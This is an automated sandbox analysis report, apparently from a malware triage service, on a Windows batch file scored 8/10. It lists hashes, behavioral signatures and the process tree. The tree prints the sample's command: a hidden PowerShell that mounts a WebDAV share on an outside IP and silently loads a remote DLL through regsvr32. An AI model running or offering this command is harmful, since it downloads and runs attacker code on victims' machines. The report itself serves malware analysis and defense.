Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 19:05
Static task
static1
Behavioral task
behavioral1
Sample
2548429964129941391.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
2548429964129941391.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
2548429964129941391.bat
-
Size
11KB
-
MD5
734fe5a8d046ee634a836f020a580867
-
SHA1
b5730dae8a85c137aa5e2a5601d4290fcaf4123d
-
SHA256
7b02dcd20292a7d213421e6f0e6c549f57c1c442e93f47255f3385739f07de32
-
SHA512
4ffa35f75dd870324626356cdb107105861fae25e7ad90ed5d4ddac9f9dea504d4a9ca93abc3d45ae83b4bb3bc63b81e987f945f1be4ff451f87529cb05d39d9
-
SSDEEP
192:eHwFk2NqwNFR/D93np/ajE5bYhaiIExkX5uqwfEPQUXYAN6uXv96L:eHwmrwNFRbBniExYhnkXkMPQUXh6Mv9S
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2736 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2736 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2824 wordpad.exe 2824 wordpad.exe 2824 wordpad.exe 2824 wordpad.exe 2824 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2824 2780 cmd.exe 31 PID 2780 wrote to memory of 2824 2780 cmd.exe 31 PID 2780 wrote to memory of 2824 2780 cmd.exe 31 PID 2780 wrote to memory of 2736 2780 cmd.exe 32 PID 2780 wrote to memory of 2736 2780 cmd.exe 32 PID 2780 wrote to memory of 2736 2780 cmd.exe 32 PID 2736 wrote to memory of 2456 2736 powershell.exe 34 PID 2736 wrote to memory of 2456 2736 powershell.exe 34 PID 2736 wrote to memory of 2456 2736 powershell.exe 34 PID 2736 wrote to memory of 604 2736 powershell.exe 35 PID 2736 wrote to memory of 604 2736 powershell.exe 35 PID 2736 wrote to memory of 604 2736 powershell.exe 35 PID 2736 wrote to memory of 604 2736 powershell.exe 35 PID 2736 wrote to memory of 604 2736 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2548429964129941391.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\26850215042435.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2456
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\26850215042435.dll3⤵PID:604
-
-